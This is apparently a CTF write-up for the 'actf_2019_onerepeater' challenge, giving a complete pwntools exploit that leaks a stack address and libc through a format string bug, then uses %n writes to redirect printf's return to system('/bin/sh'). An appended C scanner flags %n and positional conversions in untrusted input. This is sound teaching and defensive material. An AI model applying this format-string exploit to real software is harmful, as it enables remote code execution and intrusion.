actf_2019_onerepeater

<h1>Analysis</h1>
<p>The program offers two main operations.</p>
<p><img src="https://pic.imgdb.cn/item/63a6d5c808b683016366d194.png" alt="" /></p>
<p>The first reads input. There is no overflow, but it leaks a stack address.</p>
<p><img src="https://pic.imgdb.cn/item/63a6d60508b683016367252f.png" alt="" /></p>
<p>The second is a format string vulnerability, so the plan is clear: first leak a libc address and compute one_gadget from it, then write the function's return address to get a shell. Here I use system("/bin/sh") instead.</p>
<h1>Exploit</h1>
<pre><code>from pwn import *

# context.log_level = 'debug'
# o = process("./pwn")
o = remote("node4.buuoj.cn", 25919)

# Option 1 reads our input and prints the address of the stack buffer
o.sendlineafter(b"3) Exit\n", b'1')
buf = int(o.recv(8), 16)
log.info("buf: %x", buf)
# Store a format string that prints the second stack argument
o.sendline(b"%2$p")

# Option 2 passes the buffer to printf: leak a pointer into libc
o.sendlineafter(b"3) Exit\n", b'2')
puts_addr = int(o.recvline()[:-1], 16) - 11
log.info("puts_addr: %x", puts_addr)
libc_base = puts_addr - 0x67360          # offset for the remote libc
log.info("libc_base: %x", libc_base)
system = libc_base + 0x3cd10
bin_sh = libc_base + 0x17b8cf

# Stack slot holding printf's return address, and its first argument slot
printf_ret = buf - (0xffffcb40 - 0xffffcb1c)
printf_arg = printf_ret + 8

# Split both 32-bit values into 16-bit halves, one %n write each
addr1 = system & 0xffff
addr2 = (system >> 16) & 0xffff
addr3 = bin_sh & 0xffff
addr4 = (bin_sh >> 16) & 0xffff
addr = [addr1, addr2, addr3, addr4]
addr.sort()
log.info("addr1: %x addr2: %x addr3: %x addr4: %x", addr1, addr2, addr3, addr4)

# Four target addresses first (16 bytes), referenced as arguments 16..19
payload = p32(printf_ret) + p32(printf_ret + 2) + p32(printf_arg) + p32(printf_arg + 2)
# Emit the writes in ascending order so every %p padding count is positive
dic = {addr1: "%16$n", addr2: "%17$n", addr3: "%18$n", addr4: "%19$n"}
fmt = "%{}p".format(addr[0] - 16) + dic[addr[0]]
fmt += "%{}p".format(addr[1] - addr[0]) + dic[addr[1]]
fmt += "%{}p".format(addr[2] - addr[1]) + dic[addr[2]]
fmt += "%{}p".format(addr[3] - addr[2]) + dic[addr[3]]
payload += fmt.encode()
log.info("payload: %s", payload)

o.recv()
o.sendline(b'1')
o.recv()
o.sendline(payload)
o.interactive()
</code></pre>
<p><img src="https://pic.imgdb.cn/item/63a6ff1408b6830163ab1c3e.png" alt="" /></p>
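As an added example that is not part of the original writeup, the following C scanner classifies printf conversions found in untrusted input the way an input filter or a log-detection rule would, counting the positional n$ references and the %n memory writes that a payload like the one above depends on. The sample strings are constructed for the demonstration.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Summary of the conversion specifications found in one string. */
struct fmt_report {
    int conversions;   /* total % conversions (excluding literal %%) */
    int positional;    /* conversions using the n$ argument form */
    int n_writes;      /* %n conversions, i.e. memory writes */
    bool dangerous;    /* true if any %n is present */
};

/* Walk the string the way printf does: optional n$, flags, width,
 * precision and length modifiers, then the conversion character. */
struct fmt_report scan_format(const char *s)
{
    struct fmt_report r = {0, 0, 0, false};
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        p++;
        if (*p == '%') continue;                 /* literal "%%" */
        const char *q = p;                       /* positional: digits + '$' */
        while (isdigit((unsigned char)*q)) q++;
        if (q > p && *q == '$') { r.positional++; p = q + 1; }
        while (*p && strchr("-+ #0", *p)) p++;   /* flags */
        while (isdigit((unsigned char)*p) || *p == '*') p++;   /* width */
        if (*p == '.') {                         /* precision */
            p++;
            while (isdigit((unsigned char)*p) || *p == '*') p++;
        }
        while (*p && strchr("hlLqjzt", *p)) p++; /* length modifiers */
        if (!*p) break;                          /* truncated spec */
        r.conversions++;
        if (*p == 'n') { r.n_writes++; r.dangerous = true; }
    }
    return r;
}

int main(void)
{
    /* constructed sample: the shape of a leak probe and of a %n write chain */
    const char *samples[] = {"%2$p", "%200p%16$n%300p%17$n", "100%% done: %s"};
    for (size_t i = 0; i < 3; i++) {
        struct fmt_report r = scan_format(samples[i]);
        printf("%-24s conv=%d positional=%d n_writes=%d %s\n", samples[i],
               r.conversions, r.positional, r.n_writes,
               r.dangerous ? "BLOCK" : "ok");
    }
    return 0;
}
```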
